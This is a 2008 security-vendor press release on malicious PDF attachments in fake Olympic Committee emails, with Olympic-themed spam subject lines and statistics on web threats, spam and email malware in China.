Olympic Targeted Attacks Hidden in PDFs

Olympic Targeted Attacks Hidden in PDFs

SYDNEY, Australia – August 13, 2008 - MessageLabs has uncovered evidence of targeted malware being distributed in legitimate looking International Olympic Committee (IOC) emails, that have been sent to participating nation’s national sporting organisations and athlete representatives.

In this latest attack, at least 9 domains were targeted with 57 emails, which contained press release and media information relating to the International Olympic Committee. The content for the messages appears to have been taken from the IOC website. A sample of one of the emails can be found here.

The malware was hidden within an Adobe Acrobat PDF file attachment, using embedded JavaScript to drop a malicious executable program onto the target’s computer. This then compromises the infected computer allowing confidential information to be leaked to an external party. Although the initial PDF is blank, when opened, the dropped executable presents the user with a non-blank PDF that contains similar information to the press release used in the email body, thus convincing the user that the PDF is genuine. Most traditional signature based anti-virus systems are unable to detect and stop targeted attacks such as this one. The original emails appear to have come from a number of Google Mail accounts, international.olympic@gmail.com and international.olympic2008@gmail.com.

In addition to the initial direct distribution of the infected emails, as the email and its attachment appeared legitimate to many recipients, it was subsequently innocently forwarded on to other news and sporting organisations.

Worldwide interest in the Beijing Olympic Games is now reaching a high-point and MessageLabs expects to intercept more additional targeted attacks and more general malware distribution that simply capitalises on people’s interest in the Olympics. A variety of more general Olympic themed malware distribution has been intercepted by MessageLabs in recent weeks, including emails containing malicious attachments as well as web links to malware hosting sites. Examples of Olympic-themed subject lines include the following:
• Beijing Olympics cancelled, moved to Atlanta
• Emailing: Beijing takes dog off the menu for Olympics - Yahoo! News
• Obama buys 10 million Olympics ad
• 2008 Olympic Games will possible not take place
• Athletes ponder wearing masks to fight pollution - Olympics - Yahoo! Sports
• 2008 Olympic Games are under the threat
• FW: Learn Chinese for the Olympics

The online threat landscape and China
Broadband adoption in China reportedly exceeded that in the US earlier this year, with more than 71.6 million subscribers compared with 70.2 in the US, 21 million in Germany and 16.4 million in the UK (according to DITTBERNER, June 2008).

China Internet Network Information Centre (CNNIC) reported the country now had more than 253 million internet users, at the end of June. It is believed that China now has more web surfers than the US. Also, with 12.18 million ‘.cn’ domain names in circulation, China can now boast the largest top-level country code domain, next to Germany (.de).

The majority of the 12 million .cn domains are registered overseas. The domain is often favoured by malware authors as well as spammers. One of the attractions of a .cn domain is partly down to aggressive price reductions for domain purchases, making it one of the least expensive domains to own, and also because it is much harder to close down a malicious site hosted in China. With the world’s eyes focusing on the Olympic Games in Beijing, this booming marketplace is expected to become an increasingly attractive target for cybercriminals.

Web Threats in China
With China now seeing huge Internet user growth and broadband adoption, and the increased demand for cn domains, China is now an attractive target for cybercriminals. It is interesting to note that there are 1.92 million websites hosted in China (according to CNNIC), with 71.3% actually hosted under the .cn top-level country code domain.

Analysis of the MessageLabs Web Security activity during July 2008 identified that 4.4% of all web-based malware was hosted on .cn domains, making it the third most-popular domain globally behind .com and .mobi, as can be seen in the chart found here.

The majority of malicious web security threats in July were a result of a recent rise in the number of legitimate sites being compromised through SQL injection attacks. Many such attacks were also hosted on .cn domains in July. For more information on this topic, please refer to the MessageLabs Intelligence Report for July 2008 (http://www.messagelabs.com/intelligence.aspx)

Spam in China
Internet use in China has grown significantly in recent months, allowing users to access the very latest information such as breaking news stories online, as well as increase use of online shopping and online banking. Although email use in China takes second place to Instant Messaging, with 81% of Chinese Internet users favouring IM, compared with 56% who use email (according to CNNIC in January 2008); this does not dissuade the spammers. At 72.9% of all email, spam in China compares with that of other countries such as 79.8% in the US, 69.9% in the UK and 64.1% in Australia. As can be seen in the chart here, spam levels in China have increased in recent months.

As in a typical example below, more spam is now targeting Chinese domains written in the Chinese language, rather than the ubiquitous language of spam, English. During the first half of 2008, approximately 0.03% of all spam worldwide was in the Chinese language. Interestingly, less than 1% of global spam actually emanates from China.

To see an example of this Chinese spam click here. In this particular example, the sender’s company purportedly has a presence in different parts of China and has extra invoices for sales, transportation, advertising, construction, etc. If you need invoices (e.g. for your tax bill), then you are invited to contact them.

Email Malware in China
In 2007 the level of email-borne malware targeting Chinese businesses peaked, reaching 2.26% (1 in every 44.2 emails) of emails comprised some form of malware in July 2007. Since the end of last year, the level of email threats has diminished. In 2007, the malware landscape in China was dominated by mass-mailers such as Warezov, which also included an IM component used to spread itself. By July 2008, 0.07% (1 in 1,428 emails) of emails were malicious, this decline is largely due to the dwindling of mass-mailer email viruses, including Warezov coupled with the transition from malware being spread via email to being spread via drive-by-downloads on websites that have been compromised for the purpose. To see a graph of this trend, click here.

About MessageLabs
MessageLabs is a leading provider of integrated messaging and web security services, with over 18,000 clients ranging from small business to the Fortune 500 located in more than 86 countries. MessageLabs provides a range of managed security services to protect, control, encrypt and archive communications across Email, Web and Instant Messaging.

These services are delivered by MessageLabs globally distributed infrastructure and supported 24/7 by security experts. This provides a convenient and cost-effective solution for managing and reducing risk and providing certainty in the exchange of business information. For more information, please visit www.messagelabs.com

ENDS

© Scoop Media